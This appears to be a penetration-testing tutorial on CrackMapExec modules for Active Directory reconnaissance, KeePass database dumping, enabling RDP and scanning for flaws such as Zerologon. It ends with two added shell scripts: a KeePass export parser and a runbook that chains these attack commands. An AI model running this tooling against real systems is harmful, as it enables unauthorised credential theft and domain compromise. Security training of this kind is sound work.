Interesting Modules
Many CrackMapExec modules can help during the reconnaissance and post-exploitation phases. Most of them use the SMB or LDAP protocol.
LDAP Modules
The LDAP modules fetch information from the Domain Controller.
get-network Module
Active Directory-integrated DNS allows any domain user to dump all DNS records, similar to a zone transfer. Using the get-network module, any domain user can dump all DNS records from the domain or forest zone.
Three options are possible:
- getting the IPs only
- getting the hostnames only
- getting both IPs and hostnames
Another tool to dump the DNS records is adidnsdump.
LAPS Module
LAPS stands for Local Administrator Password Solution. This solution aims to mitigate the risk of reusing the same local administrator password on every domain-joined computer. Indeed, an attacker with access to that shared password could compromise the entire domain. LAPS stores and manages local admin account passwords in Active Directory and can set a random, different password for the local administrator of each domain-joined machine. The passwords are protected by ACLs, and only specific users can read them or request a password reset.
The laps module lists all computers for which the current user has read access to the LAPS password.
Machine-Account Quota (MAQ) Module
This module indicates how many machine accounts domain users are allowed to create. Some tactics to compromise the entire domain, such as certain AD CS abuses or Resource-Based Constrained Delegation, require the creation of a machine account.
daclread Module
The daclread module reads the DACL (Discretionary Access Control List) of a specific Active Directory object. It offers multiple options to enumerate DACL rights. The module does not read DACLs recursively.
Example of reading the DACL of the user Grace for read access:
We can also query the domain controller to identify specifically who has DCSync rights.
ADCS Module
Abuse of AD CS (Active Directory Certificate Services) is a very popular privilege escalation technique used by attackers in a domain. CrackMapExec has a module to help testers enumerate the PKI components of a domain.
List all PKI Enrollment Servers:
List all certificates available in a PKI:
SMB Modules
Many modules also use the SMB protocol.
Note that many SMB modules require admin rights on the target to work.
get_netconnections and ioxidresolver Modules
Both modules identify the network connections of a target. The get_netconnections module uses WMI and returns both IPv4 and IPv6 addresses. The ioxidresolver module uses RPC and does not return IPv6 addresses.
Example of using get_netconnections:
Example of using ioxidresolver:
KeePass Module
KeePass is a very popular password manager. CrackMapExec has a module to discover a KeePass XML config file on a target host and extract the whole database content in plain text. Several actions need to be performed to dump the database, but setting ACTION=ALL executes them all in one single command.
To find a KeePass XML configuration file, we can use the keepass_discover module.
The content of the KeePass database will be stored in /tmp/export.xml.
We can use grep to search for the password values.
A KeePass database has a .kdbx extension. When specifying the configuration path, use forward slashes (/) or double backslashes (\\) as separators.
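The grep approach works, but in a KeePass 2.x XML export the `<Key>Password</Key>` marker and the actual `<Value>` sit on separate lines, and each entry's `<History>` block repeats its previous versions. The helper below is an added example, not part of the original page or of CrackMapExec: it walks an export such as the /tmp/export.xml mentioned above, skips history blocks, and prints one Title/UserName/Password line per entry. The sample export it writes is constructed for the example.

```shell
#!/bin/sh
# Added example: list the entries of a KeePass 2.x XML export
# (for instance the /tmp/export.xml pulled back by the KeePass module).
# Not part of CrackMapExec; the sample XML below is constructed for the example.

# keepass_entries FILE -> one line per entry: Title<TAB>UserName<TAB>Password
keepass_entries() {
    awk '
        /<History>/   { hist = 1 }            # previous versions of an entry: skip them
        /<\/History>/ { hist = 0; next }
        hist          { next }
        /<Entry>/     { title = ""; user = ""; pass = "" }
        /<Key>Title<\/Key>/    { key = "Title";    next }
        /<Key>UserName<\/Key>/ { key = "UserName"; next }
        /<Key>Password<\/Key>/ { key = "Password"; next }
        key != "" && /<Value/ {
            v = $0
            sub(/.*<Value[^>]*>/, "", v)      # drop the opening tag and its attributes
            sub(/<\/Value>.*/, "", v)         # drop the closing tag (empty <Value /> yields "")
            if (key == "Title") title = v
            else if (key == "UserName") user = v
            else pass = v
            key = ""
        }
        /<\/Entry>/   { printf "%s\t%s\t%s\n", title, user, pass }
    ' "$1"
}

# Constructed sample export in the KeePass 2.x XML layout (nested groups,
# a protected password value and a History block that must be ignored).
SAMPLE=${TMPDIR:-/tmp}/keepass-sample-export.xml
cat > "$SAMPLE" <<'EOF'
<?xml version="1.0" encoding="utf-8"?>
<KeePassFile>
  <Root>
    <Group>
      <Name>Database</Name>
      <Entry>
        <String>
          <Key>Title</Key>
          <Value>Domain Admin</Value>
        </String>
        <String>
          <Key>UserName</Key>
          <Value>administrator</Value>
        </String>
        <String>
          <Key>Password</Key>
          <Value ProtectInMemory="True">P@ssw0rd!</Value>
        </String>
        <History>
          <Entry>
            <String>
              <Key>Password</Key>
              <Value ProtectInMemory="True">OldPassword1</Value>
            </String>
          </Entry>
        </History>
      </Entry>
      <Group>
        <Name>Servers</Name>
        <Entry>
          <String>
            <Key>Title</Key>
            <Value>File share</Value>
          </String>
          <String>
            <Key>UserName</Key>
            <Value>svc_backup</Value>
          </String>
          <String>
            <Key>Password</Key>
            <Value ProtectInMemory="True">Backup2023</Value>
          </String>
        </Entry>
      </Group>
    </Group>
  </Root>
</KeePassFile>
EOF

# Usage: keepass_entries /tmp/export.xml
keepass_entries "$SAMPLE"
```

Run it against the real export with `keepass_entries /tmp/export.xml`; the tab-separated output can be piped to `cut -f3` when only the passwords are wanted.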
Enabling RDP
We can enable or disable RDP on a target using the rdp module.
Below is an example of enabling RDP on the target with the IP 10.129.203.121. If we want to disable RDP, we specify ACTION=disable.
Vulnerability Modules
CrackMapExec offers various modules to identify (not exploit) common vulnerabilities in a domain. All of these modules use the SMB protocol and target the Domain Controller. Here are some of the most common vulnerabilities we can scan for using CME:
Vulnerability | Module | Description
---|---|---
Zerologon | | Unauthenticated attack leveraging the Netlogon protocol.
PetitPotam | | Coerces Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw.
noPac | | Allows the escalation of privileges from a regular domain user to a domain administrator.
DFSCoerce | | NTLM relay attack leveraging the Distributed File System: Namespace Management Protocol (MS-DFSNM).
ShadowCoerce | | Note: Use options
EternalBlue MS17-010 | | Unauthenticated RCE abusing the SMB service.
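The LDAP, SMB and vulnerability-scanning modules described on this page are all invoked the same way (`crackmapexec <protocol> <target> -u <user> -p <pass> -M <module> -o KEY=value`). The script below is an added example, not part of the original page or of the CrackMapExec project: a small runbook that composes those invocations in one place. Module and option names (get-network with ONLY_HOSTS/ALL, laps, maq, daclread with TARGET/TARGET_DN/ACTION/RIGHTS, adcs with SERVER, get_netconnections, ioxidresolver, keepass_discover, keepass_trigger with KEEPASS_CONFIG_PATH, rdp, and the scan modules zerologon, petitpotam, nopac, dfscoerce and ms17-010) are the ones I know from CME; confirm them for your version with `crackmapexec smb -L` and `crackmapexec ldap -L`. The credentials, the domain DN, the CA name and the KeePass config path are placeholders, and 10.129.203.121 is the target IP used on the page. With DRY_RUN=1 (the default) each command is printed instead of executed.

```shell
#!/bin/sh
# Added example (not from the page or from CrackMapExec): runbook composing the
# CME module invocations discussed above. DRY_RUN=1 prints the commands only.

CME=${CME:-crackmapexec}
DRY_RUN=${DRY_RUN:-1}
CME_USER=${CME_USER:-grace}                       # user from the daclread example
CME_PASS=${CME_PASS:-'Password123!'}              # placeholder password
DC=${DC:-10.129.203.121}                          # Domain Controller (IP from the page)
TARGET=${TARGET:-10.129.203.121}                  # SMB target (IP from the page)
DOMAIN_DN=${DOMAIN_DN:-'DC=example,DC=local'}     # placeholder domain DN
CA_NAME=${CA_NAME:-EXAMPLE-CA}                    # placeholder PKI enrollment server name
KEEPASS_CONF=${KEEPASS_CONF:-'C:/Users/grace/AppData/Roaming/KeePass/KeePass.config.xml'}  # placeholder; forward slashes as the page advises

# cme_cmd PROTO TARGET [module args...] -> prints the full command line
cme_cmd() {
    _proto=$1; _target=$2; shift 2
    printf '%s\n' "$CME $_proto $_target -u $CME_USER -p $CME_PASS $*"
}

# cme PROTO TARGET [module args...] -> prints (dry run) or executes the command
cme() {
    if [ "$DRY_RUN" = 1 ]; then
        cme_cmd "$@"
    else
        _proto=$1; _target=$2; shift 2
        "$CME" "$_proto" "$_target" -u "$CME_USER" -p "$CME_PASS" "$@"
    fi
}

# LDAP modules: read-only queries against the DC, any domain user will do
ldap_enum() {
    cme ldap "$DC" -M get-network                                  # IPs only (default)
    cme ldap "$DC" -M get-network -o ONLY_HOSTS=true               # hostnames only
    cme ldap "$DC" -M get-network -o ALL=true                      # IPs and hostnames
    cme ldap "$DC" -M laps                                         # computers whose LAPS password we may read
    cme ldap "$DC" -M maq                                          # machine account quota
    cme ldap "$DC" -M daclread -o TARGET=grace ACTION=read         # DACL of the user grace
    cme ldap "$DC" -M daclread -o TARGET_DN="$DOMAIN_DN" ACTION=read RIGHTS=DCSync  # who holds DCSync rights
    cme ldap "$DC" -M adcs                                         # PKI enrollment servers
    cme ldap "$DC" -M adcs -o SERVER="$CA_NAME"                    # certificate templates on one CA
}

# SMB modules: most of these need admin rights on the target
smb_enum() {
    cme smb "$TARGET" -M get_netconnections                        # WMI, IPv4 and IPv6
    cme smb "$TARGET" -M ioxidresolver                             # RPC, IPv4 only
    cme smb "$TARGET" -M keepass_discover                          # locate KeePass config files
    cme smb "$TARGET" -M keepass_trigger -o ACTION=ALL KEEPASS_CONFIG_PATH="$KEEPASS_CONF"  # export lands in /tmp/export.xml
    cme smb "$TARGET" -M rdp -o ACTION=enable                      # ACTION=disable turns it off again
}

# Vulnerability checks: identification only, run against the DC.
# shadowcoerce is left out because it needs extra -o options not given on the page.
vuln_scan() {
    for _m in zerologon petitpotam nopac dfscoerce ms17-010; do
        cme smb "$DC" -M "$_m"
    done
}

case ${1:-all} in
    ldap) ldap_enum ;;
    smb)  smb_enum ;;
    vuln) vuln_scan ;;
    *)    ldap_enum; smb_enum; vuln_scan ;;
esac
```

Review the printed commands first, then rerun with `DRY_RUN=0 CME_PASS='...' ./runbook.sh ldap` (or smb, vuln) to execute one group at a time.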